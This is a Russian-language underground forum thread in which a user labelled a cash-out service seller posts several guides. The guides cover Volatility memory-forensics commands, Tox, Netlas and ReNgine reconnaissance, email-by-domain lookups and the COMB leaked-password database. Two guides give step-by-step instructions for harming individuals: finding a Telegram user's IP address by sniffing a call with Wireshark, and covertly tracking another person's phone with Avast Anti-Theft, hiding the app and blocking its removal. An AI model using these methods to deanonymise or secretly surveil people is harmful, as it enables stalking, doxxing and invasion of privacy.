  3. Блокировка антивирусом работы утилиты или удаление самого анализируемого файла.
Что такое Volatility
Volatility
— инструмент криминалистической экспертизы памяти с открытым исходным кодом для анализа оперативной памяти, который часто используется при анализе вредоносного ПО для извлечения информации из дампов памяти. Инструмент позволяет изучать память работающей или спящей системы и выполнять различные методики анализа для выявления и понимания вредоносной активности.

Однако, если вы используете Kali Linux, он устанавливается по умолчанию.

В системах на основе Debian просто установите его с помощью следующей команды:

sudo apt-get install volatility
Преимущества Volatility:

  • Написан на Python: многим аналитикам памяти удобно работать со скриптами Python.
  • Кроссплатформенный: Volatility может работать на любой платформе, поддерживающей Python, что означает, что вам не нужно тратить время на загрузку или установку.
  • Имеет открытый исходный код.
  • Бесплатный.
  • Позволяет создавать скрипты: вы можете автоматизировать задачи с помощью Volatility, так как он легко позволяет использовать скрипты.
Команды в Volatility
Вот основные команды в Volatility, которые часто используются при анализе вредоносного ПО:

imageinfo — отображает основную информацию о дампе памяти, такую как профиль, версию операционной системы и уровень обновления.

volatility -f <дамп_памяти> imageinfo
pslist — команда выводит список всех запущенных процессов в дампе памяти.

volatility -f <дамп_памяти> --profile=<имя_профиля> pslist
psscan — сканирует процессы в памяти и может быть полезной для обнаружения скрытых или завершенных процессов.

volatility -f <дамп_памяти> --profile=<имя_профиля> psscan
pstree — команда отображает дерево процессов, показывая связи между родительскими и дочерними процессами.

volatility -f <дамп_памяти> --profile=<имя_профиля> pstree
dlllist — выводит список всех загруженных DLL-библиотек для каждого процесса.

volatility -f <дамп_памяти> --profile=<имя_профиля> dlllist -p <идентификатор_процесса>
handles — отображает все открытые дескрипторы (handles) в дампе памяти.

volatility -f <дамп_памяти> --profile=<имя_профиля> handles
cmdscan — сканирует историю командной строки в дампе памяти.

volatility -f <дамп_памяти> --profile=<имя_профиля> cmdscan
getsids — выводит список всех идентификаторов безопасности (SIDs) в дампе памяти.

volatility -f <дамп_памяти> --profile=<имя_профиля> getsids
apihooks — идентифицирует процессы, в которых установлены зацепления API.

volatility -f <дамп_памяти> --profile=<имя_профиля> apihooks
malfind — сканирует внедренный код или потенциально вредоносный код в работающих процессах.

volatility -f <дамп_памяти> --profile=<имя_профиля> malfind
malsysproc — идентифицирует потенциально вредоносные процессы на основе эвристик.

volatility -f <дамп_памяти> --profile=<имя_профиля> malsysproc
malfind, malprocfind и malfind2 — эти команды можно использовать вместе для сканирования внедренного кода или вредоносных процессов.

volatility -f <дамп_памяти> --profile=<имя_профиля> malfind
volatility -f <дамп_памяти> --profile=<имя_профиля> malprocfind
volatility -f <дамп_памяти> --profile=<имя_профиля> malfind2
Не забудьте заменить <дамп_памяти> путем к вашему файлу дампа памяти и <имя_профиля> на соответствующий профиль для операционной системы и архитектуры дампа памяти.

Это только базовый набор команд; Volatility предоставляет множество дополнительных плагинов и функций для расширенного анализа памяти.

Заключение
Анализ вредоносных программ помогает улучшить свою защиту от киберугроз. Процесс анализа позволяет понять методы распространения, цели и векторы атак вредоносных программ. Volatility является важным набором инструментов для анализа вредоносного ПО, так как информация, полученная с помощью этого инструмента, может быть использована для оптимизации мер безопасности.
 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
Как определить IP-адрес пользователя Telegram



Вступить в наш чат

Сегодня мы расскажем вам про простой способ деанона, а именно как узнать IP-адрес пользователя Telegram.

Как определить IP-адрес в Telegram
Чтобы определить IP-адрес в Telegram, выполните следующие шаги:
  1. Скачивание и установка сниффера Wireshark.​
  2. Выбор соответствующего интерфейса.​
  3. Звонок целевому пользователю.​
  4. Настройка параметров поиска Wireshark.​
  5. Поиск протокола TCP и определение IP-адреса.​
А теперь рассмотрим каждый этап подробнее.
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.​
Шаг 1: Скачивание Wireshark
Прежде всего, необходимо скачать и установить Wireshark, мощный инструмент для перехвата и анализа сетевых протоколов. Загрузить его можно с официального сайта Wireshark.



Скачивание Wireshark для пробива IP адреса Телеграм
После установки откройте Wireshark, и можно приступать к работе.


Скачивание Wireshark для пробива IP адреса Телеграм

Шаг 2: Выбор соответствующего интерфейса
Запустите Wireshark и выберите сетевой интерфейс, который вы хотите мониторить. Это соединение будет использоваться для совершения звонка.



Выбор интерфейса для определения IP адрес

Шаг 3: Звонок к пользователю
Используя учетную запись, инициируйте звонок целевому пользователю через Telegram.

Шаг 4: Настройка параметров поиска Wireshark
В Wireshark настройте фильтр для перехвата нужных данных. В частности, необходимо выполнить поиск по строке XDR-MAPPED-ADDRESS.


Настройка параметров поиска Wireshark


Настройка параметров поиска Wireshark

Шаг 5: Поиск протокола TCP
Найдите пакеты данных с протоколом TCP, в которых IP-адрес назначения является публичным IP-адресом. Это и есть искомый IP-адрес.



Узнать IP адрес Telegram пользователя
Когда вы обнаружите в перехваченных данных публичный IP-адрес, вы успешно определите IP-адрес целевого пользователя.


Узнать IP адрес Телеграм пользователя

Как избежать определения IP-адреса в Telegram
Чтобы избежать утечки своего IP-адреса, необходимо зайти в Настройки Telegram —> Конфиденциальность и безопасность —> Звонки, а затем выбрать Не использовать в меню Peer-to-Peer, как показано ниже.


 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
Tox - анонимный мессенджер



Вступить в наш чат

Нужна безопасная и анонимная замена Skype? Тогда вы попали в нужное место. В извечном стремлении хранить тайну переписки нам поможет мессенджер Tox. Сегодня мы расскажем, как установить и пользоваться этим мессенджером.



Как работает Tox?
Tox — это новый вид мгновенных сообщений, созданный в ответ на широкое распространение цифрового слежения со стороны корпораций и правительств. Он может похвастаться двумя технологиями: шифрованием и P2P. Это простое в использовании программное обеспечение, которое позволяет вам общаться без посторонних ушей. В отличие от других известных сервисов, которые требуют оплату за дополнительные функции, Tox абсолютно бесплатен и не содержит рекламы.

Основные функции Tox включают:
  • Мгновенные сообщения. Безопасное общение по всему миру;
  • Голосовые вызовы. Зашифрованные голосовые вызовы без каких-либо затрат;
  • Видеозвонки. Возможность видеть собеседника в режиме реального времени;
  • Поделиться экраном. Демонстрация экрана вашего компьютера;
  • Обмен файлами. Отправка и прием файлов без искусственных ограничений;
  • Групповой чат. Общение, звонки и обмен видео и файлами в групповых чатах.
Особенности Tox:
  • Все, что вы делаете в Tox, зашифровано. Единственные люди, которые могут видеть ваши разговоры, – это люди, с которыми вы разговариваете.
  • Tox – это свободное программное обеспечение. Это означает, что Tox принадлежит вам – для использования, модификации и распространения.
  • У Tox нет центральных серверов, которые можно было бы обыскать, закрыть или вынудить передать данные. Сеть состоит из ее пользователей. Поскольку здесь нет центрального сервера, пользователи могут просто включить свои клиенты и добавлять друзей без регистрации и настройки на каком-либо сервисе.
  • На сайте проекта предлагаются клиенты для популярных настольных платформ: Linux, Windows и OS X, а также для мобильных платформ Android и iOS.
  • Удобство в работе у всех клиентов примерно одинаковое. Вы запускаете клиент, придумываете ник, после чего генерируется Тох ID, который можно передать друзьям. Когда друзья добавят вас, вы получите уведомление; его нужно принять, чтобы установить соединение. Если друг недалеко и он использует мобильный клиент, он может добавить вас, отсканировав QR-код, содержащий Тох ID.
Как установить Tox?
Сначала необходимо скачать программу. Скачать анонимный мессенджер Tox бесплатно, с сайта разработчика вы можете по этой прямой ссылке. Там же на сайте вы можете скачать версии для Linux, OS X, Android и iOS.

Запускаем установщик. Отмечаем все галочки и жмем на кнопку ОК.



Настройка Tox
После запуска перейдем в настройки анонимного мессенджера.



Теперь необходимо задать псевдоним (ник) и установить текстовый статус.



В следующем окне вы увидите ваш ToxID – это ваш личный идентификатор. С помощью этого ID вас смогут найти друзья. Советуем выписать его куда нибудь и сохранить.



Выбираем микрофон для записи и воспроизведения звука и камеру для записи видео. Там же вы можете проверить работоспособность выбранных устройств.



Работа с мессенджером Tox
Для добавления нового контакта необходимо зайти в список друзей.



В появившемся окне вводим ToxID вашего собеседника и короткое сообщения. В конце нажимаем на кнопку Add.



Если кто-нибудь добавил вас — вам придет оповещение. Для подтверждения отмечаем его и нажимаем на кнопку Add.



В мессенджере есть возможность конференции. Для этого в нижнем левом углу нажмите на вторую иконку.



Тох: Детоксикация общения
Мы протестировали рТох и Venom на настольном компьютере, а заодно и Antox на Android, и убедились, что разобраться в них очень легко. Текстовые сообщения работали на всех поддерживаемых платформах, так что пользователю Venom на Ubuntu можно отправлять сообщения пользователю рТох на Windows или Antox на Android.

Пользователи всех трех клиентов на настольных ПК могут совершать аудио и видеозвонки между собой, и в нашем тестовом окружении не возникало заметных задержек или искажений. Аналогично, все клиенты могут передавать файлы: мы посылали все, от мелких картинок до больших файлов ISO, и клиенты передавали их друг другу без проблем.

Но есть пара вещей, над которыми все еще ведется активная работа. Самое важное — это возможность совершать аудио и видеозвонки с Android-клиента Antox, которая пока отсутствует. Помимо этого, сейчас в групповых чатах с несколькими участниками вы можете обмениваться только текстовыми сообщениями.

Заключение
На фоне всеобщей осведомленности о безопасности в Сети всё большее число людей чувствует необходимость в защищенной связи. Разработчики Tox обещают все и сразу. И не зря, ведь Tox — сочетает в себе два основных преимущества. Во-первых, он очень удобен, как минимум на настольном ПК. Во-вторых, это не только клиент — по сути, это Р2Р-протокол для передачи шифрованных данных. На этом все. Удачи!



 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
OSINT: Как найти человека с помощью поисковика Netlas.io



Вступить в наш чат

Одной из наиболее распространенных задач в OSINT является сбор информации о человеке по псевдониму и/или фамилии и имени. Сегодня расскажу о методе, который не слишком популярен, но может помочь найти сайты, связанные с определенным ником или именем пользователя, на страницах, которые не индексирует Google и не могут быть найдены с помощью инструментов для поиска по нику (Maigret, Sherlock и других). Речь пойдет об использовании поисковика Netlas.io.



Поиск по нику и имени с помощью Netlas.io
Netlas.io — это инструмент для обнаружения уязвимостей и угроз безопасности, но он также может использоваться для поиска пользователей в сети.

Netlas.io также предоставляет API и интеграцию с другими инструментами, такими как Maltego.

Использование оператора “http.title”
Перейдите на сайт netlas.io, выберите третью сверху вкладку (Responses Search) и введите:


Netlas.io использование для поиска по нику
Замените ivanov на интересующий вас ник, имя или фамилию пользователя. И не спешите убирать звездочки по бокам слова. Они нужны для того, чтобы искать не точное совпадение, а любые заголовки веб-страниц, в которых присутствует данное слово. Можно убрать одну звездочку, если вам нужны названия, начинающиеся или заканчивающиеся определенным ником.

Не нужно вчитываться в код в поле ответа. Просто откройте найденные ссылки в браузере.

Использование оператора “domain”
Этот пункт пригодится для поиск принадлежащих доменов:


Netlas.io использование для поиска людей
Так можно найти домены, в названии которых присутствует определенный псевдоним.

Использование оператора “http.body”
А этот запрос ищет весь текст страницы вместо заголовка. Обратите внимание, что я не использую здесь звездочки, поскольку такой поиск работает медленнее, и для начала лучше искать только точные совпадения.
http.body:soxoj



Netlas.io использование в OSINT
Этот способ подходит для поиск упоминаний о человеке на сайтах. Но, на мой взгляд, он работает хуже, чем поиск по названию или домену. Используйте его в сочетании с другими инструментами.

Символы (* и ?) и регулярные выражения Netlas
А теперь еще одно важное преимущество Netlas перед обычными поисковыми системами, такими как Google. Если вы не знаете точно, как пишется ник (например, sn0b или snob), вы можете заменить один символ на знак вопроса (или звездочку, если вы не уверены в нескольких символах).




Netlas.io поиск человека
Они также поддерживают некоторые элементы синтаксиса регулярных выражений, что открывает дополнительные возможности поиска.

Хотелось бы также обратить ваше внимание на то, что при поиске по псевдониму следует проявлять творческий подход и проверять не только основное написание, но и использовать альтернативные символы ($ вместо S и т.д.).

Заключение
Не стоит забывать, что большинство задач OSINT можно автоматизировать. И Netlas — не исключение. Он может помочь найти много дополнительной информации о человеке, но не все упоминания о нем в Интернете. Если вы хотите получить максимальное количество данных, используйте другие инструменты и другие методы поиска по нику.

 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
OSINT-разведка с помощью ReNgine



Вступить в наш чат

OSINT-разведка может занять очень много времени, если делать её вручную, не говоря уже о систематизации полученных результатов. К счастью, существует ReNgine, который может существенно упростить вашу работу. Итак, сегодня мы вам расскажем, как его установить и использовать.



Что такое ReNgine?
ReNgine — это инструмент OSINT для сбора информации при пентесте, с возможностью непрерывного мониторинга и простым, но интуитивно понятным пользовательским интерфейсом. ReNgine упорядочивает и сохраняется полученную информацию в базе данных. Таким образом, вы всегда можете получить доступ к результатам сканирования. Кроме того, вы можете включить непрерывный мониторинг цели, запуская сканирования с заданными интервалами.


Панель управления

Установка и настройка ReNgine
Устанавливать будем с репозитория GitHub:
Отредактируйте файл окружения изменив пароль по умолчанию:
Запустите сценарий инициализации:
Этот сценарий установит, настроит и запустит все необходимые контейнеры для запуска ReNgine. Во время установки тулза предложит создать имя пользователя и пароль. Сохраните их, они понадобятся для входа в пользовательский интерфейс.

Введите в браузере https://127.0.0.1, чтобы начать использовать ReNginе.



Использование ReNgine
Давайте проведем наше первое сканирование.

Шаг 1. Создайте цель.
Перейдите на вкладку целей и добавьте новую цель. Введите имя домена и, если хотите, описание.


Добавление цели


Список целей

Шаг 2. Выполните первое сканирование
Щелкните по значку молнии рядом с целью, чтобы начать сканирование. В моем случае я буду сканированить поддомены.


Запуск сканирования



Шаг 3. Оценка результатов
После завершения сканирования вы можете просмотреть все результаты. Обратите внимание, что в этом случае мы провели только сканирование поддоменов, однако этот инструмент способен на большее.


Результат

Давайте рассмотрим еще несколько функций, которые может предложить ReNgine.
  • Сканирование уязвимостей с помощью Nuclei (настраиваемое);​
  • Параллельное сканирование;​
  • Визуализация данных;​
  • Настраиваемые механизмы сканирования;​
  • Возможности OSINT;​
  • Поддержка прокси.​
Более подробное объяснение можно найти в репозитории GitHub по адресу https://github.com/yogeshojha/rengine.​
ReNgine — это мощный инструмент OSINT, который поможет выполнить задачи за считанные минуты.​
 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
Слежка за телефоном с помощью Avast Anti-Theft



Вступить в чат

Следить за мобильным телефоном можно разными способами. Сегодня мы вам расскажем об одном таком способе и, что самое главное, как сделать это скрыто.
Как отследить телефон
Сегодня речь пойдет о приложении Avast Anti-Theft, которое кроме своей основной функции Антивор может использоваться как приложение для отслеживания телефона.

Установив антивирус Аваст вместе с программой Аваст Анти-Вор, с помощью которой мы и будем следить за телефоном, можно отлично замаскировать и скрыть факт слежки.

Приложение Avast Anti-Theft создано для поиска потерянного смартфона и планшета. Также может использоваться родителями для наблюдения и контроля за детьми. Используя приложение Avast Anti-Theft в целях слежки, скрытого наблюдения, и для внегласной прослушки за посторонними людьми — вы нарушаете законодательство вашей страны!

Использование Avast Anti-Theft для слежки за телефоном
Почему именно Avast Anti-Theft?

Устанавливая на свой телефон любое приложение для отслеживания телефона вы даете этому приложению кучу прав и разрешений. Поэтому очень важно чтобы программа, а точнее разработчик, имел хорошую репутацию.

Основные возможности Avast Anti-Theft
Давайте рассмотрим, что известная антивирусная компания предлагает пользователю. Начнем с того, что приложение имеет две версии: бесплатную и платную.

В бесплатной версии:
  • Отслеживание местоположения.
  • Полное и окончательное уничтожение данных.
  • Экстренная блокировка телефона.
  • Включение сирены.
  • Скрытая переадресация всех звонков и смс-сообщений.
  • Отправка сообщений на телефон.
  • Звонок на телефон.
  • Частичная маскировка приложения на телефоне.
  • Список доверенных SIM-карт.
  • Экономия заряда аккумулятора.
  • Уведомление о разряженной батарее.
  • Удаленная перезагрузка.
  • Удаленное изменение настроек Avast Anti-Theft
В премиум версии:
  • Удаленно прослушивание и запись звука.
  • Снимок с камер (фронтальной и задней).
  • Получение данных хранящихся на телефоне.
Как вы видите даже в бесплатной версии приложения Аваст Анти-Вор довольно большие возможности. Теперь давайте разберемся как его установить, настроить и правильно с ним работать.

Скачать Avast Anti-Theft
Устанавливать приложение нужно на то устройство, которые необходимо отследить. Удаленно установить не получится. Необходимо иметь физический доступ к смартфону или другому мобильному устройству.

Для начала перейдем на страницу скачивания. Скачать приложение Avast Anti-Theft можно по этой прямой ссылке с Google Play. Переходим на официальную страницу приложения и нажимаем «Установить».

С недавнего времени приложение Avast Anti-Theft стало частью приложения Avast Antivirus. Установить отдельно невозможно.

Как я уже говорил, каждый раз при скачивании приложений с маркета надо смотреть какие права просит программа. В данном случае список разрешений довольно большой, и это не есть хорошо. Но с этим нечего не поделаешь, так как программе для корректной работы и в самом деле нужен доступ к этим параметрам.

После установки нажимаем «Открыть» или закрываем Google Play и запускаем приложение с помощью значка на рабочем столе.

Настройка Avast Anti-Theft
После запуска вам предложат ввести имя владельца устройства. Вводим и нажимаем «Продолжить».

А теперь надо установить Пин-код. Дважды вводим секретный код и нажимаем «Подтвердить». Связываем созданную учетную запись с веб-панелью Avast.

Для этого необходимо зарегистрировать свой аккаунт на сайте Аваст. Вводим рабочий адрес электронной почты и дважды пароль. Очень не рекомендую регистрироваться или авторизоваться с помощью социальных сетей.

Не забудьте надежно сохранить пароль, он вам понадобится. Для этой цели мы рекомендуем использовать лучший на наш взгляд менеджер паролей KeePass.

Если вы все сделали правильно, появится главное окно программы.

Для активации устройства и включения защиты необходимо перевести ползунок в положение активный. Программа не даст включить режим слежения до тех пор, пока не будут заполнены все необходимые поля!

После включения скрытого режима будет удален ярлык программы на рабочем столе и в меню приложений. Для вызова приложения необходимо послать специальную команду из контрольной панели на сайте Avast. После этого приложение поднимется и вы сможете изменить настройки. Кроме этого можно изменять настройки приложения прямо из контрольной панели, удаленно, не прибегая к запуску приложения на самом устройстве.

В принципе здесь нечего рассказывать, все предельно просто. Вы разберетесь сами. Многое тут зависит от ваших личных предпочтений. Разработчик постарался на славу и каждый пункт настроек снабдил подробными подсказками.

Все что касается телефона мы вроде разобрались. Теперь перейдем к веб-интерфейсу Аваст с помощью которого мы и будем отслеживать и контролировать смартфон / планшет через интернет.

Заходим на официальный сайт Avast (в нашем случае мы использовали мобильную версию сайта, так как хотели отследить телефон с помощью другого телефона) и вводим логин и пароль, которые мы зарегистрировали устанавливая приложение.

Если интерфейс будет на английском, то сразу меняем его на ваш язык. Нажимаем на иконку «Три полоски» и в выпадающем меню нажимаем на пункт «Language Settings». Затем выбираем нужный язык.

На главной странице отображены все устройства на которых установлено приложение Аваст Анти-вор и другие продукты компании Avast. Нажав на устройство мы попадаем в центр управления. Все настройки, мониторинг и контроль устройства происходят здесь.

Наверху состояние устройства, а ниже инструменты управления. Не будем подробно рассказывать про каждый инструмент, расскажу лишь как включать и отключать ту или иную функцию.

Нажимая на одну из иконок вы заходите в управление функцией. Серый цвет иконки говорит о том, что функция не активирована, а зеленый цвет означает, что инструмент включен.

К примеру, вам необходимо отследить местоположение на карте. Нажимаем на иконку «Найти», которая отвечает за местоположение телефона, и смотрим где в данный момент находится смартфон или планшет. Кроме этого есть возможность просмотреть всю историю перемещения телефона и точные координаты устройства, как за все время, так и за определенный период.

Теперь пару слов по поводу того как программа скрывает свое присутствие. Как мы поняли, в премиум версии приложение умеет скрывать себя полностью. Пользователь не увидит приложение в списке своих приложений. В обычной версии такой возможности нет, но есть интересная функция, активация которой не дает пользователю возможность удалить приложение.

Ну вот вроде и все.

Заключение
Не забывайте, что есть не мало приложений, которые предлагают те же функции, но во время того как вы следите за другими — они могут следить за вами. Не забывайте о безопасности ваших близких и защите телефона! Как вы видите отследить телефон не так уж и трудно. Мы постарались объяснить максимально доступно, чтобы было понятно даже новичку в компьютерных делах.
 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
OSINT email по домену



Вступить в наш канал


Когда необходимо собрать информацию о людях, связанных с определенным доменом, специальные инструменты для поиска электронной почты могут стать незаменимыми помощниками. В этой статье рассмотрим несколько популярных сайтов и инструментов для эффективного поиска email-адреса, связанного с определенным доменом.



Поиск электронной почты по домену
Многие из переставленных ниже сервисов платны, но имеют определенное количество бесплатных запросов, как правило — 50 контактов в месяц. Этого вполне достаточно, чтобы получить необходимую информацию. Платные пакеты — примерно 50$.

Snov.io Email Finder — это один из лучших инструментов для поиска электронной почты. Он позволяет быстро находить адреса электронной почты, связанные с любым доменом. Помимо поиска email, Snov.io также предоставляет функции для проверки валидности найденных контактов. Есть возможность интеграции с CRM-системами.

Experte Email Finder — простой и эффективный сайт для поиска email-адресов по доменам. Этот инструмент подходит для быстрого сбора контактов без лишних функций и сложных настроек. Он будет полезен тем, кто ищет минималистичный и интуитивно понятный сервис для выполнения конкретной задачи.

EmailFinder — это опенсорсный проект, размещенный на GitHub. Этот инструмент позволяет находить email-адреса, связанные с доменом, через сканирование общедоступной информации в интернете. Он более технически сложен по сравнению с веб-сервисами.

Infoga — еще один популярный опенсорсный инструмент для поиска электронной почты. Этот проект активно используется специалистами по информационной безопасности и теми, кто занимается OSINT (разведка на основе открытых данных). Infoga позволяет проводить глубокий анализ домена и поиск связанных email-адресов. Отлично подходит для OSINT.

Infoga.io — это веб-версия ранее описанного проекта Infoga. В отличие от GitHub-версии, которая требует установки и настройки, Infoga.io предоставляет удобный интерфейс для выполнения тех же задач без необходимости погружения в технические детали. Пользователи могут воспользоваться всеми преимуществами инструмента Infoga напрямую через браузер.

Findemail.io — это еще один мощный инструмент для поиска адресов электронной почты, который использует несколько источников данных для поиска адресов, связанных с определенным доменом. Сервис позволяет проверять валидность адресов и использовать различные фильтры для более точного поиска.

Hunter.io — это один из самых известных и широко используемых сервисов для поиска email-адресов по домену. Сервис позволяет легко и быстро находить корпоративные email-адреса, а также предоставляет информацию о структуре адресов компании. Hunter.io также предлагает интеграции с различными инструментами и API для автоматизации процессов. Интеграция с CRM и маркетинговыми инструментами.

Anymailfinder — это удобный инструмент для поиска электронной почты, который делает акцент на точность. Сервис использует различные алгоритмы и проверяет валидность всех найденных адресов, чтобы избежать неработающих контактов. Anymailfinder предлагает бесплатную проверку адресов и возможность интеграции с различными системами.

Minelead — это бесплатный инструмент для поиска email-адресов, который выделяется своей простотой и доступностью. Сервис предоставляет пользователям возможность находить адреса электронной почты по доменам без необходимости подписки или оплаты. Minelead.io подходит для тех, кто ищет простое решение для повседневных задач.



Заключение
Если вы ищете простой веб-интерфейс, такие сервисы как Hunter.io или Snov.io отлично подойдут любителям разведки. Для более технических пользователей, таких как специалисты OSINT, инструменты Infoga или EmailFinder, размещенные на GitHub, предложат больше гибкости и возможностей.
 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
Ваш пароль в базе утечек? Что делать?



Вступить в наш канал


Первое, что приходит на ум, когда мы слышим слово «безопасность», — это «пароль». Однако, большинство людей не уделяют особого внимания своей безопасности, что приводит к большому количеству утечек данных. В нашей статье мы поделимся с вами сервисом, который покажет, попали ли ваши пароли в базу с утечками данных, и что дальше делать с этой информацией.



Недавно была опубликована крупнейшая база данных с утекшими учетными данными (email-адресами, именами пользователей и паролями), названная COMB. Эта утечка стала крупнейшей в истории, объединив более 3,2 миллиарда учетных данных, которые были скомпрометированы в результате различных инцидентов за прошедшие годы. Среди утекших данных оказались пароли пользователей многих сайтов: VK, Gmail, Instagram, Netflix, Facebook и т,д.
Эти утечки были результатом многочисленных инцидентов за последние несколько лет, что и позволило объединить более 3,2 миллиарда учетных данных в одну базу Proxynova.

Цель этого инструмента — сделать огромную базу утекших данных доступной для поиска. Хотя цель этого сервиса заключается в повышении уровня безопасности пользователей, его легко можно использовать с противоположной целью — для поиска чужих данных и попытки их использования на различных сайтах. Это связано с тем, что многие люди используют один и тот же пароль для разных сервисов.

Сайт также предоставляет доступ к базе через API, что позволяет интегрировать поиск с вашим собственным приложением. Максимальный лимит — 100 результатов.

Как предотвратить утечку данных?
  • Создайте надежный пароль. В идеале он должен иметь от 20 до 40 символов и храниться только у вас в голове. Для того, чтобы его не удалось подобрать методом BruteForce важно не использовать информацию, имеющую какое-то к вам отношение - имена, псевдонимы, клички. Фразы и памятные даты тоже под запретом. Пароль должен содержать символы, цифры и буквы верхнего и нижнего регистра.
  • Используйте разные пароли. Это, пожалуй, один из важных и ключевых моментов. Ведь многие пользователи пренебрегают этим правилом, используя один пароль для всего на свете. Чем это грозит? Если ваш пароль попадет в руки злоумышленника, то он получит доступ ко всем сервисам, что захочет. Поэтому никогда так не делайте, используйте для разных сервисов различные комбинации.
  • Меняйтесь пароли. Вдобавок к предыдущему пункту, в целях профилактики необходимо регулярно менять пароли, хотя бы раз в год. И, что более важно, не используйте старые пароли, так как вы снижаете вашу степень защиты.
  • Подключите двухфакторную аутентификацию. Например, пароль + СМС код. Такая комбинация не даст злоумышленникам получить доступ к вашему аккаунту, даже если у них будет пароль для входа. Такая мера значительно уменьшает шанс взлома. Помимо этого, сервисы, работающие с двухфакторной аутентификацией, как правило, оповещают вас, если была попытка входа в ваш профиль.
  • Не доверяйте ненадежным сервисам. Перед тем, как вводить свои данные на каком-нибудь сайте, внимательно изучите его, если вас мучают сомнения, то не рискуйте. Старайтесь указывать лишь необходимую информацию, нужную для работы сервиса.
  • Используйте лицензионные антивирусы. Это поможет уберечь ваш ПК от вирусов, тем самым снизив риск утечки личных данных.
  • Избегайте общественных сетей Wi-Fi, так как данные зачастую сливаются именно таким способом. Взломать и перехватить данные по Wi-Fi не составляет труда даже для новичка в этом деле, что уж тут сказать про профессионала. Но если все-таки вы вынуждены подключиться к общественной сети, то делайте это только с VPN - он переадресует ваши данные и убережет от взлома.
Что делать, если утечка уже произошла?
Первое, что нужно уяснить, так это то, что нет необходимости впадать в панику, если вы узнали, что ваши данные слили. "Это еще почему?", - спросите вы. А потому, что утечки и сливы происходят в б̶о̶л̶ь̶ш̶о̶м̶ нереально огромном количестве. В открытую базу данных за раз могут попасть данные тысячи человек, а иногда даже миллиарда. Так что вероятность того, что заинтересуются именно вами крайне мала. Скорее всего вы уже 100 раз узнаете об утечке.

1. Если вы нашли себя в базе слитых данных, то вам нужно посмотреть, с какой утечкой это связано. В списке могут отображаться как утечки по сайтам, так и не привязанные к какому-то конкретному ресурсу. Каждый пункт сообщает, когда произошла утечка.

2. Когда вы выяснили, какие именно данные утекли в сеть, самое время начинать смену не только паролей, но и желательно самих email адресов. Если вы использовали разные пароли для сервисов, то вы сразу сможете понять, где была утечка, и вам не придется везде менять данные. Теперь вы еще больше понимаете, для чего нужны разные пароли для входа на каждый сервис.

Заключение
Если вам кажется, что вас никогда не взломают, и что ваши пароли надежные и не пробиваемые, то это не так. К несчастью, никто не может быть застрахован от утечки данных. Риск, того, что вас взломают, даже если вы будете следовать всем советам, все равно остается. Но это не значит, что нужно упрощать жизнь хакерам, всегда нужно быть начеку и принимать необходимые меры защиты.
 

SeviepeFainiVes

Пользователь

SeviepeFainiVes

Пользователь
Статус
Offline
Регистрация
23 Дек 2024
Сообщения
10
Реакции
0
Покупки через Гарант
0
Продажи через Гарант
0
Сверху